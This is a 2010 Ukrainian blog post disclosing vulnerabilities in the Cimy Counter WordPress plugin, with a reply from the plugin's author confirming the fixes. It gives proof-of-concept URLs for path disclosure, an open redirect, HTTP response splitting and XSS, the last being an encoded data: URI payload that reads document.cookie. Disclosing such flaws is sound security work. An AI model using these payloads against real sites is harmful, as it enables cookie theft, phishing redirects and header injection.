« Цікаве чтиво на тему web security
Новини: чуваський хакер, кіберзлочинність в Україні та взлом Antichat »

Уразливості в Cimy Counter для WordPress

15:23 24.06.2010

28.04.2010

У квітні, 20.04.2010, я знайшов Full path disclosure, Redirector, Cross-Site Scripting та HTTP Response Spitting уразливості в плагіні Cimy Counter для WordPress. Дані уразливості я виявив на сайті http://vs-db.info (лише HTTP Response Spitting я перевірив в себе на localhost). Про що найближчим часом сповіщу розробникам.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам плагіна.

24.06.2010

Full path disclosure:

http://site/wp-content/plugins/cimy-counter/cimy_counter.php

http://site/wp-content/plugins/cimy-counter/cc_redirect.php?cc=Downloads&fn=%0A1

Redirector:

http://site/wp-content/plugins/cimy-counter/cc_redirect.php?cc=Downloads&fn=http://websecurity.com.ua

XSS:

http://site/wp-content/plugins/cimy-counter/cc_redirect.php?cc=Downloads&fn=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2b

HTTP Response Spitting:

http://site/wp-content/plugins/cimy-counter/cc_redirect.php?cc=TestCounter&fn=%0AHeader:test

Працює на старих версіях PHP.

Уразливі Cimy Counter 0.9.4 та попередні версії. В версії Cimy Counter 0.9.5 автор виправив усі зазначені уразливості окрім Redirector (також відомий як URL Redirector Abuse в WASC TC v2).

Версія Cimy Counter 1.1.0 вже невразлива.


This entry was posted on 15:23 24.06.2010 and is filed under Новини сайту, Уразливості. You can follow any responses to this entry through the RSS 2.0 feed.

2 відповідей на “Уразливості в Cimy Counter для WordPress”

  1. Marco Cimmino каже:
    Четвер, 17:29 15.12.2011

    All the issues should be fixed in v1.1.0 please update this page.

  2. MustLive каже:
    Четвер, 19:02 15.12.2011

    Marco

    Thanks for informing. In version 0.9.5 you’ve fixed most of the vulnerabilities and it’s good that you’ve fixed all of them in version 1.1.0.

Leave a Reply

You must be logged in to post a comment.